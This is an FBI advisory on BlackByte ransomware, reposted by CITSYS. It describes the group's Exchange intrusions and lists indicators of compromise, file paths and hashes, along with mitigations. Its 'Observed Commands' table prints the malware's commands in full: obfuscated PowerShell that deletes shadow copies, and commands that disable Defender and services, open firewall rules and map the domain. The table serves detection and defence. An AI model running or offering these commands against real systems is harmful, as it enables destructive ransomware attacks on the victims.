BlackByte Ransomware (Using Exchange Vulnerabilities)
Indicators Of Compromise Associated With Blackbyte Ransomware
Summary
This Cybersecurity Advisory was developed by the Federal Bureau of Investigation (FBI) on BlackByte ransomware and shared with CITSYS. As of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture). BlackByte is a Ransomware as a Service (RaaS) group that encrypts files on compromised Windows host systems, including physical and virtual servers.
Technical Details
The BlackByte executable leaves a ransom note in all directories where encryption occurs. The ransom note includes the .onion site that contains instructions for paying the ransom and receiving a decryption key. Some victims reported the actors used a known Microsoft Exchange Server vulnerability as a means of gaining access to their networks. Once in, actors deploy tools to move laterally across the network and escalate privileges before exfiltrating and encrypting files. In some instances, BlackByte ransomware actors have only partially encrypted files. In cases where decryption is not possible, some data recovery can occur. Previous versions of BlackByte ransomware downloaded a .png file from IP addresses 185.93.6.31 and 45.9.148.114 prior to encryption. A newer version encrypts without communicating with any external IP addresses. BlackByte ransomware runs executables from c:\windows\system32\ and C:\Windows\. Process injection has been observed on processes it creates.
Indicators of Compromise
The following indicators of compromise (IOCs) are assessed to be associated with BlackByte activity:
| Suspicious files discovered in the following locations: |
| Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946 |
| inetpub\wwwroot\aspnet_client |
| Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth |
| Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current |
| Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes |
| Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts |
| Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts\premium |
The filenames for suspicious ASPX files appeared to have the following naming conventions:
- <5 random alphabetical characters>.aspx
- error<2 capital letters>.aspx
- iismeta<4 random numbers>.aspx
| Suspicious files were also discovered at: |
| %AppData%\BB.ico This file is the icon given to files with a .blackbyte file extension. |
| %AppData%\BlackByteRestore.txt This file is the ransom note that is left in every folder where files are encrypted. |
| %AppData%\dummy This file is a text file containing a list of machine names that can be reached on the network. |
| %HOMEPATH%\complex.exe This file is the ransomware executable. |
| Users\tree.dll This file contains the message “Your HACKED by BlackByte team. Connect us to restore your system.” (SIC) |
Scheduled tasks may be created and artifacts have been observed at Windows\System32\Tasks:
| C:\Users\\complex.exe -single . This command appears to launch the ransomware. |
| C:\Windows\System32\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll. This command attempts to open tree.dll in wordpad 75 times and then prints the contents. |
IIS logs contain GET and POST requests to various malicious ASPX files that follow a pattern of “/.aspxexec_code=Response.Write”
Below is a list of hashes of suspicious files that have been observed on systems affected by BlackByte ransomware:
| MD5 Hashes: | |
| 4d2da36174633565f3dd5ed6dc5033c4 | 959a7df5c465fcd963a641d87c18a565 |
| cd7034692d8f29f9146deb3641de7986 | 5f40e1859053b70df9c0753d327f2cee |
| d63a7756bfdcd2be6c755bf288a92c8b | df7befc8cdc3c5434ef27cc669fb1e4b |
| eed7357ab8d2fe31ea3dbcf3f9b7ec74 | 51f2cf541f004d3c1fa8b0f94c89914a |
| 695e343b81a7b0208cbae33e11f7044c | d9e94f076d175ace80f211ea298fa46e |
| 296c51eb03e70808304b5f0e050f4f94 | 8320d9ec2eab7f5ff49186b2e630a15f |
| 0c7b8da133799dd72d0dbe3ea012031e | cea6be26d81a8ff3db0d9da666cd0f8f |
| a77899602387665cddb6a0f021184a2b | 31f818372fa07d1fd158c91510b6a077 |
| 1473c91e9c0588f92928bed0ebf5e0f4 | d9e94f076d175ace80f211ea298fa46e |
| 28b791746c97c0c04dcbfe0954e7173b | a9cf6dce244ad9afd8ca92820b9c11b9 |
| 52b8ae74406e2f52fd81c8458647acd8 | 7139415fecd716bec6d38d2004176f5d |
| 1785f4058c78ae3dd030808212ae3b04 | c13bf39e2f8bf49c9754de7fb1396a33 |
| b8e24e6436f6bed17757d011780e87b9 | 5c0a549ae45d9abe54ab662e53c484e2 |
| 8dfa48e56fc3a6a2272771e708cdb4d2 | ad29212716d0b074d976ad7e33b8f35f |
| 4ce0bdd2d4303bf77611b8b34c7d2883 | d4aa276a7fbe8dcd858174eeacbb26ce |
| c010d1326689b95a3d8106f75003427c | 9344afc63753cd5e2ee0ff9aed43dc56 |
| ae6fbc60ba9c0f3a0fef72aeffcd3dc7 | e2eb5b57a8765856be897b4f6dadca18 |
| 405cb8b1e55bb2a50f2ef3e7c2b28496 | 58e8043876f2f302fbc98d00c270778b |
| 11e35160fc4efabd0a3bd7a7c6afc91b | d2a15e76a4bfa7eb007a07fc8738edfb |
| 659b77f88288b4874b5abe41ed36380d | e46bfbdf1031ea5a383040d0aa598d45 |
| 151c6f04aeff0e00c54929f25328f6f7 |
Below is a list of observed commands that were executed by complex.exe:
| Observed Commands: |
| cmd.exe /c powershell -command “$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘VwBpA’ +’G4ARAB’+’lAGYA’+’ZQB’+’uAG’+’QA’));Stop-Service -Name $x;Set-Service -StartupType Disabled $x” |
| schtasks.exe /DELETE /TN “\”Raccine Rules Updater\”” /F |
| cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB |
| cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded |
| cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB |
| cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded |
| cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB |
| cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded |
| cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB |
| cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded |
| cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB |
| cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded |
| cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB |
| cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded |
| powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlA HQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+’AFcAaQBuADMAMgBfAFMAaABhAGQAb wB3AGMAbwBwAHkAIAB8AC’+’AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A CAAewAkA’+’F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==’));Invoke-Expression $x |
| sc.exe config SQLTELEMETRY start= disabled |
| sc.exe config SQLTELEMETRY$ECWDB2 start= disabled |
| sc.exe config SQLWriter start= disabled |
| sc.exe config SstpSvc start= disabled |
| powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled |
| sc.exe config MBAMService start= disabled |
| sc.exe config wuauserv start= disabled |
| sc.exe config Dnscache start= auto |
| sc.exe config fdPHost start= auto |
| sc.exe config FDResPub start= auto |
| sc.exe config SSDPSRV start= auto |
| sc.exe config upnphost start= auto |
| sc.exe config RemoteRegistry start= auto |
| cmd.exe /c netsh advfirewall firewall set rule “group=\”Network Discovery\”” new enable=Yes |
| cmd.exe /c netsh advfirewall firewall set rule “group=\”File and Printer Sharing\”” new enable=Yes |
| cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f |
| cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f |
| cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f |
| mountvol.exe A: \\?\Volume{d7e47829-0000-0000-0000-100000000000}\ |
| mountvol.exe B: \\?\Volume{d7e47829-0000-0000-0000-b0e213000000}\ |
| mountvol.exe E: \\?\Volume{fce79ce0-b01f-11e6-b968-806e6f6e6963}\ |
| powershell.exe Install-WindowsFeature -Name \”RSAT-AD-PowerShell\” – IncludeAllSubFeature |
| net.exe view |
| arp.exe -a |
| powershell.exe Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name |
| notepad.exe %appdata%\RestoreMyFiles_BlackByte.txt |
| cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del C:\Users\REM\Desktop\hybrid-9-8\complex.exe |
| The base64 encoded string in the following command: |
| powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlA HQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+’AFcAaQBuADMAMgBfAFMAaABhAGQAb wB3AGMAbwBwAHkAIAB8AC’+’AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A CAAewAkA’+’F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==’));Invoke-Expression $x |
| Decodes to: |
| Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} |
| The base64 encoded string in the following command: |
| cmd.exe /c powershell -command “$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘VwBpA’+’G4ARA B’+’lAGYA’+’ZQB’+’uAG’+’QA’));Stop-Service -Name $x;Set-Service -StartupType Disabled $x” |
Mitigations
- Implement regular backups of all data to be stored as air gapped, password protected copies offline. Ensure these copies are not accessible for modification or deletion from any system where the original data resides.
- Implement network segmentation, such that all machines on your network are not accessible from every other machine.
- Install and regularly update antivirus software on all hosts, and enable real time detection.
- Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
- Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
- Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.
- Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs for any unusual activity.
- Consider adding an email banner to emails received from outside your organization.
- Disable hyperlinks in received emails.
- Use double authentication when logging into accounts or services.
- Ensure routine auditing is conducted for all accounts.
- Ensure all the identified IOCs are input into the network SIEM for continuous monitoring and alerts.
Resources
- For additional resources related to the prevention and mitigation of ransomware, go to https://www.stopransomware.gov as well as the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide. Stopransomware.gov is the Government’s official one-stop location for resources to tackle ransomware more effectively.
- CISA’s Ransomware Readiness Assessment (RRA) is a no-cost self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident.
- CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
